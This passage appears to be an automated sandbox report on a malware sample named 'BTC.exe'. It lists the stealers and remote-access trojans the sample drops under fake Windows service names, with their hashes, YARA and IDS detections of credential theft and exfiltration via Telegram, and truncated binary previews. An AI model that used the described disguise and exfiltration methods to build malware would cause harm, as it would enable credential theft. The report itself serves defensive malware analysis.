                                                  • Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifacts associated with disabling Windows Defender, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: ditekSHen
                                                  • Rule: MALWARE_Win_QuasarRAT, Description: QuasarRAT payload, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{..f.................N..........Nl... ........@.. ....................................@..................................k..W.................................................................................... ............... ..H............text...TL... ...N.................. ..`.rsrc................P..............@..@.reloc...............X..............@..B................0l......H..........,.......h....Q...J...........................................0..........(....r...p(....s....%r...po....%ro..po....%r...po....%ro..po....%r...po....%r...p.r...p(....o....%r...po....o....(....r...p(.....s....%.o....%.o....%.o....%.o....%.o....(....&..&..*....................0..........(....r*..p(....s....%r...po....%ro..po....%r...po....%ro..po....%r...po....%r...p.r...p(....o....%r:..po....o....(....r*..p(.....s....%.o....%.o....%.o....%.o....%.o....(....&..&..*...
                                                  Process:C:\Users\user\Desktop\BTC.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):44032
                                                  Entropy (8bit):5.563778957979535
                                                  Encrypted:false
                                                  SSDEEP:384:P/ixLdTHZGdG/lYbgZrExLM/mZ4+11FILihivQ7pkFMAMiLTg9ZZwd/mVvNVqEsh:HQPcGtpE9M/XAFHhIRFe9/4OChkiXr
                                                  MD5:5322A12CB24E83BFA9746FBDE06D07E7
                                                  SHA1:5263A4F26BDA073E9F82DD4FA612EB494DD771C7
                                                  SHA-256:4957D607C2984F94A258DBA088FA1AB85E508BFAABE9279BF8B6BF6F4B97A9BB
                                                  SHA-512:67BFAEF1DDF4AD44218C82C5634E7F726304845FAB1D5361353FDACD8D8D767FEC32C871FA304F4199DDE3F6224BE76C67560A64C1D72BBE20E134C50D1BF058
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 81%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....I.f................................. ........@.. ....................... ............@....................................W.......0............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc...0...........................@..@.reloc..............................@..B........................H........`..._............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                  Process:C:\Users\user\AppData\Roaming\Cracked.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):75776
                                                  Entropy (8bit):5.801146631564073
                                                  Encrypted:false
                                                  SSDEEP:1536:dU40cxhzjBCViPMVSe9VdQuDI6H1bf/6hQzceLVclN:dU1cxhzVCiPMVSe9VdQsH1bfoQ3BY
                                                  MD5:0DFA83A82F6418C73406D78296DE61BE
                                                  SHA1:DD7ECEEF8A434C43E0751E180BF714E08771D336
                                                  SHA-256:8D27369FFA8B29D561FA9DAF485BE14D2FC00287BB1C69D4C84D514891C8DB5E
                                                  SHA-512:9A4B026250B18C29AB7DD48203F321C2EF2F12695BD2DCB52EBBC15001C8DDF019D5A7E04DA056C50C1881CE269D1810259BF6D04B61F471E8751B7192FC73D4
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 87%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.............................4... ...@....@.. ....................................@.................................D4..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B.................4......H.......Py..........0....................................................W......H3.......W......3........./.\.....{....*"..}....*..{....*"..}....*..{....*"..}....*.~....(....9.....~....(....(....*.(....*n~....(....~.....(....(....*.r...p.(.....(.....@....(.....A...(....*f.~#...}......}.....($...*..($...*.~....%:....&~....../...sM...%.....sN...(O...~....(.........*.~....o....9 ...~.....(....(G...9....~.....(....*.s................s)........~J...............*.s.........*r~....o
                                                  Process:C:\Users\user\Desktop\BTC.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):8704
                                                  Entropy (8bit):4.739992627696532
                                                  Encrypted:false
                                                  SSDEEP:96:1xXv/rn2JKbqjV6IoG71k7PNnvIcckV579WbhRN6+fwls+VV7+bN+EhkBQET8lzj:z/rn2JKb6V6NGRk7Vwe9WbhRNEdwyJC
                                                  MD5:9215015740C937980B6B53CEE5087769
                                                  SHA1:A0BFE95486944F1548620D4DE472C3758E95D36A
                                                  SHA-256:A5390A297F14EF8F5BE308009EC436D2A58598188DBB92D7299795A10BA1C541
                                                  SHA-512:5B9BBF1836466D803D3E160A38E10C8397AA3966C120AB6435A52B7D0A09EB664EF2172BF0E7E2DE1CC3EAE261167C9355FA7AC3B1B7E4504A7E07B82C4B90E2
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\crack.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_Rezlt, Description: Yara detected Rezlt, Source: C:\Users\user\AppData\Roaming\crack.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A.e.............................7... ...@....@.. ....................................@.................................D7..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................7......H........%..L............................................................(....(....*.0..........(....9....r...p(....&r...p(....r/..p~....(....(.......................r3..p...(.......rk..p...(.......r...p...(.......r...p...r...p(.......r...p....(........r...p....~........r7..p....(.......rU..p(........ru..p..(......(....(....&*r...p(....&*.0..-.......s......r...p =...o........&.......,..o......*........................!.......0..=.......s......s......r...po......o......o......
                                                  Process:C:\Users\user\Desktop\BTC.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):174080
                                                  Entropy (8bit):5.922618827152215
                                                  Encrypted:false
                                                  SSDEEP:3072:T+STW8djpN6izj8mZwlZbX5gD5sLIPu/i9bTJ2cJ+rj6+Wpn:w8XN6W8mmzmDWMPSi9b1O
                                                  MD5:96014694A042D8344B910BC47D79337B
                                                  SHA1:9D19AB2F110AE58F30965A5A3D608CBF51986EDB
                                                  SHA-256:4950EB74909BD6E739E38E57D8C6465C76EF108D65CAC9F130D3F5C6D2FE943F
                                                  SHA-512:FE308C42B3AD2C3D73A834399AA12EA23F336103389181DFACE80A81DA8BE1FFD9A950CAC802DC8A806AD318EB90A6BB6021D1ACD9206A07749F83F2BB6CD03D
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infostealers, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g............"...0.............N.... ........@.. ....................................`.....................................K.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H........6..t..............................................................<...4..#.V.w.d!...HAZ.......I.1.......Y.T8D.c[..2.....I...g...:.m..e.........j{Um7..9.M.&,..C....:.]).#..l.AG8.B..3O)..n............5.).c.....ati..2..g)...%....P...7^.<$."......V..;...$0.xC.=VD..b......9A..Pu.|.`.X....E...g.1..F.OU...9=.^tL..l.U..%./^}.....< b...0....8..h..z.;.G..EbT.s..;...........>T....uRa[...'.........\RU..eh.F..i...,.z8....a......f....M.\%......T"...i.G.e..
                                                  Process:C:\Users\user\Desktop\BTC.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):230912
                                                  Entropy (8bit):6.297675450114108
                                                  Encrypted:false
                                                  SSDEEP:3072:P+STW8djpN6izj8mZwDODZG6vmwTMUbBYeVUeE1dMGryePSuqKv65A8kC5A6+Wpn:E8XN6W8mmGmvUbGp54uVv6SHC
                                                  MD5:B8DF7316CC35A0FB6FE3A326B4283010
                                                  SHA1:D49C11F5A95F72E37D6194DF41178F2B7FAA01EE
                                                  SHA-256:F243DF692EE7552286D52B23E4993E07A27877AA86C63B84903A8E6CBD0D19F3
                                                  SHA-512:3EF92BE29123695820970A003FD0561A57F87C8C6ADAE86781729027CE40EDE4B63DA30D0B0CC75376BD9AE90ACCAF674FC7FF799A8B73AB4BB45B2CA65FF120
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\update.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Roaming\update.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infostealers, Source: C:\Users\user\AppData\Roaming\update.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Roaming\update.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g............"...0..|.............. ........@.. ....................................`.....................................W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B.......................H........6...d.............................................................<...4..#.V.w.d!...HAZ.......I.1.......Y.T8D.c[..2.....I...g...:.m..e.........j{Um7..9.M.&,..C....:.]).#..l.AG8.B..3O)..n............5.).c.....ati..2..g)...%....P...7^.<$."......V..;...$0.xC.=VD..b......9A..Pu.|.`.X....E...g.1..F.OU...9=.^tL..l.U..%./^}.....< b...0....8..h..z.;.G..EbT.s..;...........>T....uRa[...'.........\RU..eh.F..i...,.z8....a......f....M.\%......T"...i.G.e..
                                                  Process:C:\Windows\SysWOW64\PING.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):502
                                                  Entropy (8bit):4.621947447102293
                                                  Encrypted:false
                                                  SSDEEP:12:PYI5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:DdUOAokItULVDv
                                                  MD5:3C2549B8E8B5460A95748CCC3CD1BEA8
                                                  SHA1:99895C6D36EC820FE6A210E186B09AF7CD089696
                                                  SHA-256:EAFA177E97F49A260A5951D5B4EC13790F9D909597F417523B07109A96482BF7
                                                  SHA-512:A75E3251EAD6D1CDDB9D54ED989FCD1817A395745C831BF8EAF70CED5EA62C7B5B957C699391D3664CF401B88E97E2E8112C5C2AB94FEC39B22564A56D6D43D0
                                                  Malicious:false
                                                  Preview:..Pinging 936905 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.886242395185257
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:BTC.exe
                                                  File size:1'159'168 bytes
                                                  MD5:f1424e5b9810a4a9c33506aa784fca89
                                                  SHA1:4ad6287fe149832551afbcb1113db50cd133777b
                                                  SHA256:8a3da2a07e82bf22f3cd239de861b2b8c50c9fe9ee2ba12a33564e1b5cc93fed
                                                  SHA512:e03432137a7c12c03d34302fe4e1774a3a08935d39f665e4086fd8637f4ea961a645e2a8bb3cd85dd24c54861e4f01b0500a70641e2fa3a4a09e2e89a3b77380
                                                  SSDEEP:12288:JYYjzzONcuuIYsYNeaCbU6sKySaVQ4pBgncu7EKHCBbsCU/hpgmxCBbsCUXEGnF9:eg9uurUngnBU97EniCUppoiCUXfF9
                                                  TLSH:483512BF31572614FB623FB1CC216840586C3F1C38B27667D8B8FE577ABE6885890499
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..f................................. ........@.. ....................................@................................
                                                  Icon Hash:0f71e969e9f96117
                                                  Entrypoint:0x50bcee
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x66D29848 [Sat Aug 31 04:12:56 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x10bc94         0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x10c000         0x10d8c       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x11e000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0x109cf4      0x109e00  fac118dfda39e39d38a28c50117f90fd  False     0.9721548836389281   data       7.998268120908593    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x10c000         0x10d8c       0x10e00   c2629c558c2e758fcd68e803b5be9640  False     0.06809895833333333  data       2.0106016487580005   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x11e000         0xc           0x200     a628a44e0ca10f1b6b4661f73589dd94  False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA       Size     Type                                                                                              Language  Country  ZLIB Complexity
RT_ICON        0x10c130  0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2953 x 2953 px/m                      0.059328049213297054
RT_GROUP_ICON  0x11c958  0x14     data                                                                                                                  1.0
RT_VERSION     0x11c96c  0x234    data                                                                                                                  0.4698581560283688
RT_MANIFEST    0x11cba0  0x1ea    XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                                     0.5469387755102041
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        Protocol  SID      Signature                                                                      Severity  Source Port  Dest Port  Source IP        Dest IP
2024-09-03T06:15:58.964537+0200  TCP       2049872  ET MALWARE Rezlt RDP Grabber - This is Not RDP                                 1         49705        443        192.168.2.5      149.154.167.220
2024-09-03T06:15:58.964613+0200  TCP       2045614  ET MALWARE MSIL/Spyware Activity via Telegram (Response)                       1         443          49705      149.154.167.220  192.168.2.5
2024-09-03T06:16:41.916861+0200  TCP       2031009  ET MALWARE StormKitty Data Exfil via Telegram                                  1         49728        443        192.168.2.5      149.154.167.220
2024-09-03T06:16:41.916861+0200  TCP       2044766  ET MALWARE WorldWind Stealer Checkin via Telegram (GET)                        1         49728        443        192.168.2.5      149.154.167.220
2024-09-03T06:15:58.451017+0200  TCP       2036383  ET MALWARE Common RAT Connectivity Check Observed                              1         49706        80         192.168.2.5      208.95.112.1
2024-09-03T06:16:42.593395+0200  TCP       2803305  ETPRO MALWARE Common Downloader Header Pattern H                               3         49730        443        192.168.2.5      149.154.167.220
2024-09-03T06:16:41.704665+0200  TCP       2031009  ET MALWARE StormKitty Data Exfil via Telegram                                  1         49729        443        192.168.2.5      149.154.167.220
2024-09-03T06:16:41.704665+0200  TCP       2044766  ET MALWARE WorldWind Stealer Checkin via Telegram (GET)                        1         49729        443        192.168.2.5      149.154.167.220
2024-09-03T06:16:39.987059+0200  TCP       2855924  ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound                       1         49719        7812       192.168.2.5      146.190.29.250
2024-09-03T06:16:04.017776+0200  TCP       2036383  ET MALWARE Common RAT Connectivity Check Observed                              1         49707        80         192.168.2.5      208.95.112.1
2024-09-03T06:16:48.962020+0200  TCP       2044557  ET MALWARE WorldWind Stealer Sending System information via Telegram (POST)    1         49734        443        192.168.2.5      149.154.167.220
2024-09-03T06:16:42.985167+0200  TCP       2803305  ETPRO MALWARE Common Downloader Header Pattern H                               3         49731        443        192.168.2.5      149.154.167.220
2024-09-03T06:16:05.473252+0200  TCP       2853685  ETPRO MALWARE Win32/XWorm Checkin via Telegram                                 1         49708        443        192.168.2.5      149.154.167.220
                                                  Sep 3, 2024 06:16:41.498666048 CEST44349728149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:41.500395060 CEST49728443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:41.500421047 CEST44349728149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:41.533214092 CEST44349729149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:41.533291101 CEST49729443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:41.535160065 CEST49729443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:41.535168886 CEST44349729149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:41.535388947 CEST44349729149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:41.537672997 CEST49729443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:41.537698030 CEST44349729149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:41.704710007 CEST44349729149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:41.704765081 CEST44349729149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:41.705003977 CEST49729443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:41.705698013 CEST49729443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:41.720969915 CEST49730443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:41.720993996 CEST44349730149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:41.721072912 CEST49730443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:41.721308947 CEST49730443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:41.721318960 CEST44349730149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:41.916889906 CEST44349728149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:41.916913033 CEST44349728149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:41.916968107 CEST49728443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:41.916974068 CEST44349728149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:41.917072058 CEST49728443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:41.918684959 CEST49728443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:41.926868916 CEST49731443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:41.926894903 CEST44349731149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:41.927031040 CEST49731443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:41.927359104 CEST49731443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:41.927375078 CEST44349731149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:42.343116045 CEST44349730149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:42.344695091 CEST49730443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:42.344713926 CEST44349730149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:42.519591093 CEST44349731149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:42.521164894 CEST49731443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:42.521179914 CEST44349731149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:42.593437910 CEST44349730149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:42.593502998 CEST44349730149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:42.593569994 CEST49730443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:42.594230890 CEST49730443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:42.985193014 CEST44349731149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:42.985265970 CEST44349731149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:42.985600948 CEST49731443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:42.985975981 CEST49731443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:43.294312954 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:43.294361115 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:43.294462919 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:43.296211004 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:43.296221018 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:43.880975962 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:43.882709980 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:43.882736921 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:44.177115917 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:44.180207014 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:44.180223942 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:44.181196928 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:44.181204081 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:44.181320906 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:44.181335926 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:44.181430101 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:44.181448936 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:44.181684017 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:44.181698084 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:44.181787014 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:44.181793928 CEST44349733149.154.167.220192.168.2.5
